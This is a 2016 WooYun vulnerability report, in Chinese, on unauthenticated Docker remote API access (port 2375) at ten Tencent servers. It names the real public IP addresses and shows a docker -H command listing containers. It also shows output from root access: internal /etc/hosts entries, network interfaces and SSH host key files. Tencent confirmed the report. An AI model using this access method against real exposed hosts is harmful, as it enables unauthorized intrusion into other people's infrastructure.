当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0209760

漏洞标题:新姿势之获取腾讯十台机器root权限(疑似20+G代码仓库)

相关厂商:腾讯

漏洞作者: 黑客,绝对是黑客

提交时间:2016-05-17 16:28

修复时间:2016-07-02 11:50

公开时间:2016-07-02 11:50

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-17: 细节已通知厂商并且等待厂商处理中
2016-05-18: 厂商已经确认,细节仅向厂商公开
2016-05-28: 细节向核心白帽子及相关领域专家公开
2016-06-07: 细节向普通白帽子公开
2016-06-17: 细节向实习白帽子公开
2016-07-02: 细节向公众公开

简要描述:

黑客,绝对是黑客!
轻轻送送拿root
声明下,没有碰数据和代码

详细说明:

疑似20多g代码

6433D3CEE46A1A401670E14588E508E1.jpg


2375端口未授权访问,一共10台

182.254.145.30
115.159.142.215
115.159.151.75
115.159.127.198
115.159.119.88
115.159.157.226
115.159.142.220
115.159.112.88
115.159.205.90
115.159.157.68


拿这个证明115.159.119.88

http://115.159.119.88:2375


列出images

root@ip-172-31-43-63:/home/ubuntu# docker -H tcp://115.159.119.88:2375 ps
CONTAINER ID        IMAGE                                                              COMMAND                CREATED             STATUS              PORTS                                                                         NAMES
cb4574cdb29c        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    8 minutes ago       Up 8 minutes        0.0.0.0:46934->6210/tcp, 0.0.0.0:20066->14888/tcp, 0.0.0.0:46936->36000/tcp   container_1458634523754_7996_02_000003_34
aba75599dbd7        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    8 minutes ago       Up 8 minutes        0.0.0.0:46928->6210/tcp, 0.0.0.0:21951->14888/tcp, 0.0.0.0:46932->36000/tcp   container_1458634523754_8238_02_000003_34
f738c487e6ba        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    8 minutes ago       Up 8 minutes        0.0.0.0:22086->14888/tcp, 0.0.0.0:46927->36000/tcp                            container_1460213284004_4606_01_000003_34
2a64fe25ec69        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    8 minutes ago       Up 8 minutes        0.0.0.0:46925->6210/tcp, 0.0.0.0:20561->14888/tcp, 0.0.0.0:46926->36000/tcp   container_1458634523754_8066_02_000003_34
35f7b3709f79        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    8 minutes ago       Up 8 minutes        0.0.0.0:46924->6210/tcp, 0.0.0.0:22091->14888/tcp, 0.0.0.0:46923->36000/tcp   container_1460213284004_4608_01_000002_34
be7f9bc7a60a        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    8 minutes ago       Up 8 minutes        0.0.0.0:21736->14888/tcp, 0.0.0.0:46922->36000/tcp                            container_1458634523754_2349_02_000002_34
b7233a0fd6e2        docker.qq.com:80/gcloud/acc_cloud:latest                           "/etc/rc.local bash    8 minutes ago       Up 8 minutes        0.0.0.0:46919->6220/tcp, 0.0.0.0:46920->6223/tcp, 0.0.0.0:46921->36000/tcp    container_1460950863294_0081_01_000005_34
1703ce2bb1ab        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    8 minutes ago       Up 8 minutes        0.0.0.0:22051->14888/tcp, 0.0.0.0:46918->36000/tcp                            container_1460213284004_1645_01_000001_34
b0374417ecf4        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    8 minutes ago       Up 8 minutes        0.0.0.0:21986->14888/tcp, 0.0.0.0:46917->36000/tcp                            container_1458634523754_10983_02_000001_34
5e10fe7dc8ef        docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest   "/etc/rc.local bash    6 days ago          Up 6 days           0.0.0.0:22441->14888/tcp, 0.0.0.0:46213->36000/tcp                            container_1460950863294_22798_01_000002_34
e1249fa8b307        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    11 days ago         Up 11 days          0.0.0.0:45465->6210/tcp, 0.0.0.0:22426->14888/tcp, 0.0.0.0:45464->36000/tcp   container_1460950863294_17702_01_000002_34
954fb5890386        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    13 days ago         Up 13 days          0.0.0.0:45132->6210/tcp, 0.0.0.0:22381->14888/tcp, 0.0.0.0:45131->36000/tcp   container_1460950863294_15653_01_000002_34
042da5523c5c        docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest   "/etc/rc.local bash    2 weeks ago         Up 2 weeks          0.0.0.0:22366->14888/tcp, 0.0.0.0:43712->36000/tcp                            container_1460950863294_9355_01_000002_34
7e75db06835c        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    2 weeks ago         Up 2 weeks          0.0.0.0:43707->6210/tcp, 0.0.0.0:22346->14888/tcp, 0.0.0.0:43708->36000/tcp   container_1460950863294_9089_01_000002_34
7b8c3d8416f5        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    3 weeks ago         Up 3 weeks          0.0.0.0:42983->6210/tcp, 0.0.0.0:22306->14888/tcp, 0.0.0.0:42982->36000/tcp   container_1460950863294_7315_01_000002_34
ffa5ec0c90a3        docker.qq.com:80/gcloud/free_zone_version_server_20160420:latest   "/etc/rc.local bash    3 weeks ago         Up 3 weeks          0.0.0.0:22281->14888/tcp, 0.0.0.0:42762->36000/tcp                            container_1460950863294_4170_01_000002_34
8cb83c32b459        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    3 weeks ago         Up 3 weeks          0.0.0.0:22261->14888/tcp, 0.0.0.0:42599->36000/tcp                            container_1460950863294_3794_01_000002_34
051108731aab        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    3 weeks ago         Up 3 weeks          0.0.0.0:42107->6210/tcp, 0.0.0.0:22246->14888/tcp, 0.0.0.0:42109->36000/tcp   container_1460950863294_2688_01_000002_34
043e9e2fe3ce        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    3 weeks ago         Up 3 weeks          0.0.0.0:22236->14888/tcp, 0.0.0.0:42104->36000/tcp                            container_1460950863294_2681_01_000002_34
05bdd4a7450b        docker.qq.com:80/gcloud/acc_cloud:latest                           "/etc/rc.local bash    4 weeks ago         Up 4 weeks          0.0.0.0:41027->6220/tcp, 0.0.0.0:41024->6223/tcp, 0.0.0.0:41026->36000/tcp    container_1460950863294_0081_01_000002_34
9c4b20ff2175        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    4 weeks ago         Up 4 weeks          0.0.0.0:41008->6210/tcp, 0.0.0.0:22221->14888/tcp, 0.0.0.0:41007->36000/tcp   container_1460950863294_0021_01_000002_34
aeb0ff169be7        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    4 weeks ago         Up 4 weeks          0.0.0.0:22196->14888/tcp, 0.0.0.0:41005->36000/tcp                            container_1460213284004_6792_01_000002_33
c5a773f8afc7        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    4 weeks ago         Up 4 weeks          0.0.0.0:22191->14888/tcp, 0.0.0.0:41004->36000/tcp                            container_1460213284004_6791_01_000002_33
d108ad37cbb3        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    5 weeks ago         Up 5 weeks          0.0.0.0:40489->6210/tcp, 0.0.0.0:20021->14888/tcp, 0.0.0.0:40488->36000/tcp   container_1458634523754_14139_01_000002_32
60896378d4cf        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    5 weeks ago         Up 5 weeks          0.0.0.0:21561->14888/tcp, 0.0.0.0:40486->36000/tcp                            container_1458634523754_13297_01_000002_32
c1b234c28429        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    5 weeks ago         Up 5 weeks          0.0.0.0:22031->14888/tcp, 0.0.0.0:40291->36000/tcp                            container_1458634523754_12766_01_000002_32
f6254905fc6f        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    5 weeks ago         Up 5 weeks          0.0.0.0:40289->6210/tcp, 0.0.0.0:20106->14888/tcp, 0.0.0.0:40288->36000/tcp   container_1458634523754_11107_01_000002_32
af2ff31c86ab        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    5 weeks ago         Up 5 weeks          0.0.0.0:40284->6210/tcp, 0.0.0.0:20261->14888/tcp, 0.0.0.0:40282->36000/tcp   container_1458634523754_11010_01_000002_32
d35de4f633fa        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    5 weeks ago         Up 5 weeks          0.0.0.0:21996->14888/tcp, 0.0.0.0:40276->36000/tcp                            container_1458634523754_10985_01_000002_32
0559a177d6b0        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    6 weeks ago         Up 6 weeks          0.0.0.0:21616->14888/tcp, 0.0.0.0:40269->36000/tcp                            container_1458634523754_10451_01_000002_32
df8468c257ec        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    6 weeks ago         Up 6 weeks          0.0.0.0:40267->6210/tcp, 0.0.0.0:20781->14888/tcp, 0.0.0.0:40266->36000/tcp   container_1458634523754_9768_01_000002_32
3d0f2f63a1bb        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    6 weeks ago         Up 6 weeks          0.0.0.0:40265->6210/tcp, 0.0.0.0:21961->14888/tcp, 0.0.0.0:40264->36000/tcp   container_1458634523754_9465_01_000002_32
a9c7b78217a8        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    6 weeks ago         Up 6 weeks          0.0.0.0:40261->6210/tcp, 0.0.0.0:21941->14888/tcp, 0.0.0.0:40262->36000/tcp   container_1458634523754_8235_01_000002_32
4d8e7fe3b285        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    6 weeks ago         Up 6 weeks          0.0.0.0:40192->6210/tcp, 0.0.0.0:20566->14888/tcp, 0.0.0.0:40191->36000/tcp   container_1458634523754_8067_01_000002_32
f5950106f1a8        docker.qq.com:80/gcloud/free_zone_dir_server_withacc:latest        "/etc/rc.local bash    6 weeks ago         Up 6 weeks          0.0.0.0:40165->6210/tcp, 0.0.0.0:20726->14888/tcp, 0.0.0.0:40164->36000/tcp   container_1458634523754_8010_01_000002_32
d2d3dd6bc3d2        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    7 weeks ago         Up 7 weeks          0.0.0.0:20676->14888/tcp, 0.0.0.0:40163->36000/tcp                            container_1458634523754_2412_01_000002_32
7f23e748dd87        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    7 weeks ago         Up 7 weeks          0.0.0.0:20346->14888/tcp, 0.0.0.0:40146->36000/tcp                            container_1458634523754_2342_01_000002_32
17470d2efef0        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    7 weeks ago         Up 7 weeks          0.0.0.0:20341->14888/tcp, 0.0.0.0:40145->36000/tcp                            container_1458634523754_2340_01_000002_32
1d517f7801b5        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    7 weeks ago         Up 7 weeks          0.0.0.0:21776->14888/tcp, 0.0.0.0:40062->36000/tcp                            container_1458634523754_1005_01_000002_32
42bc26a016b6        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    7 weeks ago         Up 7 weeks          0.0.0.0:20881->14888/tcp, 0.0.0.0:40061->36000/tcp                            container_1458634523754_1001_01_000002_32
a253660026e0        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    8 weeks ago         Up 8 weeks          0.0.0.0:21511->14888/tcp, 0.0.0.0:39923->36000/tcp                            container_1458508352011_0322_01_000002_30
e552964949c8        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    8 weeks ago         Up 8 weeks          0.0.0.0:20206->14888/tcp, 0.0.0.0:39918->36000/tcp                            container_1457551624703_8652_01_000002_24
f30c5597ebf2        docker.qq.com:80/gcloud/free_zone_version_server:latest            "/etc/rc.local bash    8 weeks ago         Up 8 weeks          0.0.0.0:21646->14888/tcp, 0.0.0.0:39914->36000/tcp                            container_1457551624703_8405_01_000002_24


image repository为docker.qq.com,证明为腾讯
神奇一键拿root,成功登录
/etc/hosts

[root@docker-10-237-142-103 home]# cat /etc/hosts
127.0.0.1  localhost  VM_142_103_centos
10.105.39.219     docker-10-105-39-219
10.105.57.227     docker-10-105-57-227
10.105.48.96     docker-10-105-48-96
10.105.15.73     docker-10-105-15-73
10.105.46.15     docker-10-105-46-15
10.105.52.172     docker-10-105-52-172
10.105.111.112     docker-10-105-111-112
10.105.112.140     docker-10-105-112-140
10.237.132.103     docker-10-237-132-103
10.247.48.125     docker-10-247-48-125
10.237.142.103     docker-10-237-142-103
10.247.70.137     docker-10-247-70-137
10.131.165.90   docker.qq.com docker-10-131-165-90
10.131.164.129    registry.qq.com docker-10-131-164.129
10.105.110.204     docker-10-105-110-204
10.105.110.156     docker-10-105-110-156


ping docker.qq.com

[root@docker-10-237-142-103 home]# ping docker.qq.com
PING docker.qq.com (10.131.165.90) 56(84) bytes of data.
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=1 ttl=61 time=0.334 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=2 ttl=61 time=0.332 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=3 ttl=61 time=0.303 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=4 ttl=61 time=0.304 ms
64 bytes from docker.qq.com (10.131.165.90): icmp_seq=5 ttl=61 time=0.371 ms


ifconfig

[root@docker-10-237-142-103 home]# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.1  netmask 255.255.255.0  broadcast 0.0.0.0
        ether 56:84:7a:fe:97:99  txqueuelen 0  (Ethernet)
        RX packets 2253025437  bytes 153768496578 (143.2 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2183642671  bytes 191079773682 (177.9 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.237.142.103  netmask 255.255.254.0  broadcast 10.237.143.255
        ether 52:54:00:89:9b:8f  txqueuelen 1000  (Ethernet)
        RX packets 1701689621  bytes 183712984058 (171.0 GiB)
        RX errors 0  dropped 1346  overruns 0  frame 0
        TX packets 2315262507  bytes 294166431344 (273.9 GiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


ssh key

[root@docker-10-237-142-103 ssh]# ls -al
total 288
drwxr-xr-x.  2 root root       4096 Feb  1 11:28 .
drwxr-xr-x. 87 root root       4096 Mar 21 17:01 ..
-rw-r--r--.  1 root root     242153 Mar  6  2015 moduli
-rw-r--r--.  1 root root       2208 Mar  6  2015 ssh_config
-rw-------   1 root root       4378 Feb  1 11:28 sshd_config
-rw-r-----   1 root ssh_keys    227 Nov 26 09:42 ssh_host_ecdsa_key
-rw-r--r--   1 root root        162 Nov 26 09:42 ssh_host_ecdsa_key.pub
-rw-r-----   1 root ssh_keys    387 Nov 26 09:42 ssh_host_ed25519_key
-rw-r--r--   1 root root         82 Nov 26 09:42 ssh_host_ed25519_key.pub
-rw-r-----   1 root ssh_keys   1675 Nov 26 09:42 ssh_host_rsa_key
-rw-r--r--   1 root root        382 Nov 26 09:42 ssh_host_rsa_key.pub

漏洞证明:

修复方案:

参考 http://drops.wooyun.org/papers/15892

版权声明:转载请注明来源 黑客,绝对是黑客@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-18 11:40

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无